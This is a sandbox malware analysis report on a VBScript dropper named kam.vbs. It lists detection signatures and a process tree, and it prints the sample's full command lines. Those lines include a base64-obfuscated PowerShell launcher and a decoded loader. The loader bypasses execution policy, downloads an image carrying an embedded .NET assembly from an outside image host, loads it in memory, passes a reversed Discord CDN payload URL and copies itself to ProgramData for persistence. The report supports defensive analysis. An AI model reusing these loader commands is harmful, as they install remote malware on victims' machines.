Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kam.vbs

Overview

General Information

Sample name:kam.vbs
Analysis ID:1448042
MD5:c88d25dc3e72a583170ab361b79aa427
SHA1:a540c3499b88719df6a0cdd57009abd83c76eee4
SHA256:c8c814ebef97635b93e647552fd70186d98eff845b265710fec0bcb23775044d
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kam.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreNgDgTre4DgTreDkDgTreMQDgTreyDgTreDUDgTreMgDgTrexDgTreGQDgTreOQDgTre1DgTreGUDgTreNQDgTrewDgTreDQDgTreMQDgTreyDgTreGQDgTreMwDgTre1DgTreDUDgTreZDgTreDgTre1DgTreDIDgTreMDgTreBjDgTreGYDgTreZDgTreBlDgTreDIDgTreMQBlDgTreGQDgTreMDgTreBkDgTreDEDgTreZQDgTrexDgTreDUDgTreNgDgTrewDgTreDkDgTreZgBlDgTreDIDgTreMgDgTrezDgTreDMDgTreZgBjDgTreGIDgTreMDgTreDgTre2DgTreDUDgTreMgBmDgTreDQDgTreNwDgTre1DgTreDUDgTreYwBjDgTreGYDgTreYQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGMDgTreZQDgTrexDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGMDgTreNgDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrebQBhDgTreGsDgTreLwDgTre4DgTreDEDgTreMwDgTre4DgTreDQDgTreMQDgTre3DgTreDQDgTreNwDgTreyDgTreDgDgTreNQDgTrewDgTreDIDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 5308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 1008 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 6308 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2672JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2672INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xcb81a:$b2: ::FromBase64String(
    • 0xccd4d:$b2: ::FromBase64String(
    • 0xcd3eb:$b2: ::FromBase64String(
    • 0xcdbab:$b2: ::FromBase64String(
    • 0xce202:$b2: ::FromBase64String(
    • 0xcb67f:$b3: ::UTF8.GetString(
    • 0xccbb2:$b3: ::UTF8.GetString(
    • 0xcd250:$b3: ::UTF8.GetString(
    • 0xcda10:$b3: ::UTF8.GetString(
    • 0xce067:$b3: ::UTF8.GetString(
    • 0x33dde:$s1: -join
    • 0x3ce9c:$s1: -join
    • 0x71ab8:$s3: reverse
    • 0x786f7:$s3: reverse
    • 0x7a73e:$s3: reverse
    • 0x8576d:$s3: reverse
    • 0xe46e7:$s3: reverse
    • 0xeffa0:$s3: reverse
    • 0x16774f:$s3: reverse
    • 0x167a3d:$s3: reverse
    • 0x168157:$s3: reverse
    Process Memory Space: powershell.exe PID: 616JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 616INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x7b2eb:$b2: ::FromBase64String(
      • 0x7b937:$b2: ::FromBase64String(
      • 0x7cc2f:$b2: ::FromBase64String(
      • 0x80178:$b2: ::FromBase64String(
      • 0x80751:$b2: ::FromBase64String(
      • 0xa7649:$b2: ::FromBase64String(
      • 0xa7c95:$b2: ::FromBase64String(
      • 0xa8fb8:$b2: ::FromBase64String(
      • 0xaa71e:$b2: ::FromBase64String(
      • 0xaaede:$b2: ::FromBase64String(
      • 0xab536:$b2: ::FromBase64String(
      • 0xac069:$b2: ::FromBase64String(
      • 0xb4ea1:$b2: ::FromBase64String(
      • 0x7b150:$b3: ::UTF8.GetString(
      • 0x7b79c:$b3: ::UTF8.GetString(
      • 0x7ca94:$b3: ::UTF8.GetString(
      • 0x7ffdd:$b3: ::UTF8.GetString(
      • 0x805b6:$b3: ::UTF8.GetString(
      • 0xa74ae:$b3: ::UTF8.GetString(
      • 0xa7afa:$b3: ::UTF8.GetString(
      • 0xa8e1d:$b3: ::UTF8.GetString(
      SourceRuleDescriptionAuthorStrings
      amsi64_616.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Spreading

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&68912521d95e50412d355d520cfde21ed0d1e15609fe2233fcb0652f4755ccfa=mh&ce1d0566=si&c6322566=xe?txt.mak/8138417472850263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMetho

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGw